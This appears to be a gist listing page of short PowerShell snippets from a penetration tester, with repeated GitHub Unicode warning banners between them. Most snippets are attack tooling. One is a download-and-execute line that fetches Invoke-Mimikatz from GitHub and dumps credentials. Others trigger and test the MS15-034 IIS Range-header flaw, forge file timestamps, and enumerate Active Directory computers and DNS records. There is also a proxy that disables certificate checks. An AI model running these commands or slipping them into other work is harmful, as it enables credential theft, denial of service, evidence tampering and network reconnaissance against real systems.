This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# define and encode test data | |
$TestString = 'This is a test. A short test for encoding and padding.' | |
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString)) | |
# insert random '=' | |
$Length = $Encoded.Length | |
$RandomChar = 1..($Length - 3) | Get-Random | |
$Encoded = $Encoded.Insert($RandomChar,'=') | |
# strip out '=' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8000/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl))) | |
$HRes.ContentLength64 = $Buf.Length | |
$HRes.OutputStream.Write($Buf,0,$Buf.Length) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell.exe -com '([adsisearcher]'objectCategory=Computer').Findall() | ForEach {$_.properties.cn}' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#simple and dirty proxy | |
#usage: http://127.0.0.1:8000/?url=http://www.obscuresec.com | |
$Up = "http://+:8000/" | |
$Hso = New-Object Net.HttpListener | |
$Wco = New-Object Net.Webclient | |
#ignore self-signed/invalid ssl certs | |
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True} | |
Foreach ($P in $Up) {$Hso.Prefixes.Add($P)} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Set-MacAttribute { | |
<# | |
.SYNOPSIS | |
Sets the modified, accessed and created (Mac) attributes for a file based on another file or input. | |
PowerSploit Function: Set-MacAttribute | |
Author: Chris Campbell (@obscuresec) | |
License: BSD 3-Clause | |
Required Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-ADDNSRecords { | |
<# | |
update of dns-dump.ps1 by Michael B. Smith | |
michael at smithcons dot com | |
https://github.com/mmessano/PowerShell/blob/master/dns-dump.ps1 | |
#> | |
Param( | |
[string]$zone = "$env:USERDNSDOMAIN", | |
[string]$dc = "$(($env:LOGONSERVER).trim('\'))" | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$wc=new-object net.webclient | |
$im=$wc.downloadstring('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1') | |
iex $im | |
invoke-mimikatz -DumpCreds |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Test-MS15034($url) { | |
try { | |
$wr = [Net.WebRequest]::Create($url) | |
$wr.AddRange('bytes',18,18446744073709551615) | |
$res = $wr.GetResponse() | |
$status = $res.statuscode | |
Write-Output "$status means it is not vulnerable" | |
$res.Close() | |
}catch { | |
if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"} |
NewerOlder